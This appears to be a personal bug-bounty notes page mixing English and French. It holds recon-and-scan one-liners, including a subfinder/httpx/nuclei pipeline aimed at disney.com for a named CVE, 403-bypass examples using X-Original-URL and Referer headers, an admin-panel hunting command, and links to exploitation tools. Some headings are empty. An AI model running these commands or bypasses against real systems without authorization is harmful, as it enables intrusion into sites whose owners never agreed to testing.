subfinder -d disney.com -silent -all À httpx -silent -threads 100 | nuclei -id CVE-2022-26138 -v
fuxploider : file upload vulnerability scanner and exploitation tool
—————————————
If you want to bypass endpoint always to use own methodology.
Example:
Http Header based bypass:
1. X Original URL: /redact
Example:
GET /api/getUser HTTP/1.1 -> 403
Host: redact.com
GET / HTTP/1.1
Host: redact.com
X Original URL: /api/getUser -> 200 OK
2. Referer: https://site.com/api/redact
Example:
GET /api/getUser HTTP/1.1 -> access denied
Host: redact.com
GET / HTTP/1.1
Host: redact.com
Referer: https://site.com/api/getUser —> 200 OK
or
GET /api/getUser HTTP/1.1
Host: redact.com
Referer: https://site.com/api/getUser -> 200 OK
—————————————–
expression régulière pour trouver des secrets
————————————–
Bug bounty platform
bugcrowd
hackerone
———————
Trouver des comptes administrateurs
cat domains_list.txt | httpx -ports 80,443,8080,8443 -paths “wordlist.txt” -mr “password”
https://raw.githubusercontent.com/the-robot/admin-finder/master/wordlist.txt
—————————-
Java Deserialization Cheat Sheet
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
—————————
Automation Time-based Blind SQL injection on HTTP Headers using Blisqy tool
https://github.com/JohnTroony/Blisqy
——————————
Zeratool v2.2: Automatic Exploit Generation (AEG) with automated remote libc leaking and ret2dlresolve rop chain generation for exploitable CTF problems.
——————————
scraping login with xss
—————————————————–
Dlinject – Inject A Shared Library (I.E. Arbitrary Code) Into A Live Linux Process, Without Ptrace
https://www.kitploit.com/2022/07/dlinject-inject-shared-library-ie.html?utm_source=dlvr.it&utm_medium=twitter
https://github.com/DavidBuchanan314/dlinject
—————————————
make url path combinations using a wordlist
https://github.com/trickest/mkpath
——————————–